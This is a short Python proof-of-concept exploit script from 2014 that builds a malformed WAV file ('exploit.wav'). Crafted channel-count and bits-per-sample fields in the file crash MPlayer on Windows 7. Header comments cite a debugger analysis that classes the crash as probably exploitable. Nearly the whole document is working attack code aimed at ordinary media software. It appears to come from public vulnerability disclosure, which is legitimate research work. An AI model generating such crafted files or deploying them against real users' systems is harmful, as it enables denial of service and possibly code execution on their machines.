#!C:\Python27\python.exe

# Exploit Title: MPlayer - DoS
# Date: 2014-05-10
# Exploit Author: John Cobb - www.NoBytes.com
# Vendor Homepage: www.mplayerhq.hu
# Software Link: http://sourceforge.net/projects/mplayer-win32/files/MPlayer%20and%20MEncoder/r37182%2Bg09725c1/MPlayer-x86_64-r37182%2Bg09725c1.7z/download
# Version: [05/03/2014] (MPlayer-x86_64-r37182+g09725c1)
# Tested on: Win7 SP1 64bit
# CVE: None

# !exploitable
# Exploitability Classification: PROBABLY_EXPLOITABLE
# Recommended Bug Title: Probably Exploitable - Data Execution Prevention Violation near NULL starting at Unknown Symbol @ 0x0000000000000008 called from Unknown Symbol @ 0x00000000067f2340 (Hash=0x48484848.0x53535353)
# User mode DEP access violations are probably exploitable if near NULL.

# WAV Header:
WAVRIFFHEADER   = "\x52\x49\x46\x46\x00\x00\x00\x00\x57\x41\x56\x45"
# Format Chunk:
FMTPT1          = "\x66\x6D\x74\x20\x10\x00\x00\x00\xFE\xFF"
wChannels       = "\x01\x06" # 1537 - The Crash
FMTPT2          = "\x40\x1F\x00\x00\x00\xFA\x00\x00\x08\x00"
wBitsPerSample  = "\xD1\xFF" # 65489 - The Crash

payload = WAVRIFFHEADER + FMTPT1 + wChannels + FMTPT2 + wBitsPerSample

f = open("exploit.wav", 'w')
f.write(payload)
f.close()